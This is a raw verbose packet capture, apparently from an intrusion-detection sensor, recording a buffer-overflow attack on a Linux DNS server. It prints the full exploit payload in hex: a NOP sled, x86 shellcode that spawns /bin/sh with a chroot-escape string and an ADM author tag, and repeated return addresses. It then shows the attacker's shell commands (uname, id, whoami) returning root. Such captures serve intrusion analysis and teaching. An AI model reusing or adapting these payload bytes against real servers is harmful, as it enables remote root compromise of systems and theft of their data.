No run mode specified, defaulting to verbose mode

10/27-12:40:25.044101 0:3:FD:FA:30:1C -> 0:50:56:49:0:41 type:0x800 len:0x4D
192.168.20.15:1032 -> 192.168.36.14:53 UDP TTL:63 TOS:0x0 ID:12278 IpLen:20 DgmLen:63
Len: 43
2C 86 00 00 00 01 00 00 00 00 00 00 06 6B 6C 6C  ,............kll
61 69 30 06 68 6B 6E 74 65 63 03 6E 65 74 00 00  ai0.hkntec.net..
06 00 01  ...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:25.046093 0:50:56:49:0:41 -> 0:3:FD:FA:30:1C type:0x800 len:0xC9
192.168.36.14:53 -> 192.168.20.15:1032 UDP TTL:64 TOS:0x0 ID:35262 IpLen:20 DgmLen:187
Len: 167
2C 86 84 80 00 01 00 01 00 02 00 02 06 6B 6C 6C  ,............kll
61 69 30 06 68 6B 6E 74 65 63 03 6E 65 74 00 00  ai0.hkntec.net..
06 00 01 C0 0C 00 06 00 01 00 00 70 80 00 30 02  ...........p..0.
6E 73 C0 0C 06 6B 6C 6C 61 69 30 02 69 65 04 63  ns...kllai0.ie.c
75 68 6B 03 65 64 75 02 68 6B 00 77 46 3B AE 00  uhk.edu.hk.wF;..
00 01 2C 00 00 00 3C 00 09 3A 80 00 00 70 80 C0  ..,...<..:...p..
0C 00 02 00 01 00 00 70 80 00 02 C0 2F C0 0C 00  .......p..../...
02 00 01 00 00 70 80 00 06 03 6E 73 32 C0 0C C0  .....p....ns2...
2F 00 01 00 01 00 00 70 80 00 04 C0 A8 24 0E C0  /......p.....$..
79 00 01 00 01 00 00 70 80 00 04 C0 A8 14 0F  y......p.......
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.969980 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x53
192.168.20.14:1492 -> 192.168.36.26:53 UDP TTL:63 TOS:0x0 ID:18291 IpLen:20 DgmLen:69
Len: 49
5E CF 01 00 00 01 00 00 00 00 00 00 03 77 77 77  ^............www
06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64  .hacker.captured
03 63 6F 6D 00 00 01 00 01  .com.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.972039 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x53
192.168.36.26:1032 -> 192.168.20.11:53 UDP TTL:64 TOS:0x0 ID:13884 IpLen:20 DgmLen:69
Len: 49
D6 BB 00 00 00 01 00 00 00 00 00 00 03 77 77 77  .............www
06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64  .hacker.captured
03 63 6F 6D 00 00 01 00 01  .com.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.983149 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x4A
192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48728 IpLen:20 DgmLen:60 DF
******S* Seq: 0xA7F881FC Ack: 0x0 Win: 0x7D78 TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 136971605 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.983547 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x4A
192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13885 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0xA47F9734 Ack: 0xA7F881FD Win: 0x7D78 TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 78345698 136971605 NOP
TCP Options => WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.984125 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42
192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48729 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA7F881FD Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 136971605 78345698
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.986587 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x44
192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48730 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0xA7F881FD Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 136971605 78345698
19 E3  ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.986689 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42
192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13886 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA47F9735 Ack: 0xA7F881FF Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 78345698 136971605
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.986631 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5EA
192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48731 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xA7F881FF Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 136971605 78345698
D6 BB 84 00 00 01 00 01 00 00 00 01 03 77 77 77  .............www
06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64  .hacker.captured
03 63 6F 6D 00 00 01 00 01 03 77 77 77 06 68 61  .com......www.ha
63 6B 65 72 08 63 61 70 74 75 72 65 64 03 63 6F  cker.captured.co
6D 00 00 01 00 01 00 00 01 2C 00 04 01 02 03 04  m........,......
03 77 77 77 06 68 61 63 6B 65 72 08 63 61 70 74  .www.hacker.capt
75 72 65 64 03 63 6F 6D 00 00 1E 00 01 00 00 01  ured.com........
2C 19 6B 00 06 61 64 6D 61 64 6D 00 00 90 90 90  ,.k..admadm.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90  ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.989826 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42
192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13887 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA47F9735 Ack: 0xA7F887A7 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 78345699 136971605
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.989753 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5EA
192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48732 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xA7F887A7 Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 136971606 78345698
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90  ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.989789 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5EA
192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48733 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xA7F88D4F Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 136971606 78345698
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 E9 AC 01 00 00 5E 89  ..............^.
76 0C 8D 46 08 89 46 10 8D 46 2E 89 46 14 56 EB  v..F..F..F..F.V.
54 5E 89 F3 B9 00 00 00 00 BA 00 00 00 00 B8 05  T^..............
00 00 00 CD 80 50 8D 5E 02 B9 FF 01 00 00 B8 27  .....P.^.......'
00 00 00 CD 80 8D 5E 02 B8 3D 00 00 00 CD 80 5B  ......^..=.....[
53 B8 85 00 00 00 CD 80 5B B8 06 00 00 00 CD 80  S.......[.......
8D 5E 0B B8 0C 00 00 00 CD 80 89 F3 B8 3D 00 00  .^...........=..
00 CD 80 EB 2C E8 A7 FF FF FF 2E 00 41 44 4D 52  ....,.......ADMR
4F 43 4B 53 00 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E  OCKS.../../../..
2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F  /../../../../../
00 5E B8 02 00 00 00 CD 80 89 C0 85 C0 0F 85 8E  .^..............
00 00 00 89 F3 8D 4E 0C 8D 56 18 B8 0B 00 00 00  ......N..V......
CD 80 B8 01 00 00 00 CD 80 E8 75 00 00 00 10 00  ..........u.....
00 00 00 00 00 00 74 68 69 73 69 73 73 6F 6D 65  ......thisissome
74 65 6D 70 73 70 61 63 65 66 6F 72 74 68 65 73  tempspaceforthes
6F 63 6B 69 6E 61 64 64 72 69 6E 79 65 61 68 79  ockinaddrinyeahy
65 61 68 69 6B 6E 6F 77 74 68 69 73 69 73 6C 61  eahiknowthisisla
6D 65 62 75 74 61 6E 79 77 61 79 77 68 6F 63 61  mebutanywaywhoca
72 65 73 68 6F 72 69 7A 6F 6E 67 6F 74 69 74 77  reshorizongotitw
6F 72 6B 69 6E 67 73 6F 61 6C 6C 69 73 63 6F 6F  orkingsoalliscoo
6C EB 86 5E 56 8D 46 08 50 8B 46 04 50 FF 46 04  l..^V.F.P.F.P.F.
89 E1 BB 07 00 00 00 B8 66 00 00 00 CD 80 83 C4  ........f.......
0C 89 C0 85 C0 75 DA 66 83 7E 08 02 75 D3 8B 56  .....u.f.~..u..V
04 4A 52 89 D3 B9 00 00 00 00 B8 3F 00 00 00 CD  .JR........?....
80 5A 52 89 D3 B9 01 00 00 00 B8 3F 00 00 00 CD  .ZR........?....
80 5A 52 89 D3 B9 02 00 00 00 B8 3F 00 00 00 CD  .ZR........?....
80 EB 12 5E 46 46 46 46 46 C7 46 10 00 00 00 00  ...^FFFFF.F.....
E9 FE FE FF FF E8 E9 FF FF FF E8 4F FE FF FF 2F  ...........O.../
62 69 6E 2F 73 68 00 2D 63 00 FF FF FF FF FF FF  bin/sh.-c.......
FF FF FF FF FF FF FF 00 00 00 00 70 6C 61 67 75  ...........plagu
65 7A 5B 41 44 4D 5D 31 30 2F 39 39 2D 65 78 69  ez[ADM]10/99-exi
74 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90  t...............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3  ................
D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3  ................
D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3  ................
D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3  ................
D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3  ................
D6 FF BF 00 00 00 00 00  ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.989990 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42
192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13888 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA47F9735 Ack: 0xA7F892F7 Win: 0x76C8 TcpLen: 32
TCP Options (3) => NOP NOP TS: 78345699 136971606
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.999880 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5EA
192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48734 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0xA7F892F7 Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 136971606 78345699
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00  ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

10/27-12:40:54.999893 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x385
192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48735 IpLen:20 DgmLen:887 DF
***AP*** Seq: 0xA7F8989F Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 136971606 78345699
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:55.009791 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13889 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA47F9735 Ack: 0xA7F89BE2 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78345701 136971606 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.025389 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5B 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48736 IpLen:20 DgmLen:77 DF ***AP*** Seq: 0xA7F89BE2 Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971706 78345701 63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a; 70 77 64 3B 20 69 64 3B 0A pwd; id;. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.030806 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x88 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13890 IpLen:20 DgmLen:122 DF ***AP*** Seq: 0xA47F9735 Ack: 0xA7F89BFB Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78345803 136971706 4C 69 6E 75 78 20 6E 74 65 63 31 36 2D 33 36 20 Linux ntec16-36 32 2E 32 2E 31 37 2D 31 34 20 23 31 20 4D 6F 6E 2.2.17-14 #1 Mon 20 46 65 62 20 35 20 31 38 3A 34 38 3A 35 30 20 Feb 5 18:48:50 45 53 54 20 32 30 30 31 20 69 36 38 36 20 75 6E EST 2001 i686 un 6B 6E 6F 77 6E 0A known. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.049772 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48737 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89BFB Ack: 0xA47F977B Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971706 78345803 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.049893 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x6E 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13891 IpLen:20 DgmLen:96 DF ***AP*** Seq: 0xA47F977B Ack: 0xA7F89BFB Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78345805 136971706 2F 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 /.uid=0(root) gi 64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73 d=0(root) groups 3D 35 30 30 28 70 65 74 65 72 29 0A =500(peter). 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.051240 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48739 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89BFB Ack: 0xA47F97A7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971708 78345805 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:58.763188 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x49 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48747 IpLen:20 DgmLen:59 DF ***AP*** Seq: 0xA7F89BFB Ack: 0xA47F97A7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971978 78345805 77 68 6F 61 6D 69 0A whoami. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:58.769057 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x47 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13893 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xA47F97A7 Ack: 0xA7F89C02 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346076 136971978 72 6F 6F 74 0A root. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:58.789927 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48750 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C02 Ack: 0xA47F97AC Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971981 78346076 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:00.024978 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x53 192.168.20.14:1492 -> 192.168.36.26:53 UDP TTL:63 TOS:0x0 ID:18293 IpLen:20 DgmLen:69 Len: 49 5E CF 01 00 00 01 00 00 00 00 00 00 03 77 77 77 ^............www 06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64 .hacker.captured 03 63 6F 6D 00 00 01 00 01 .com..... 
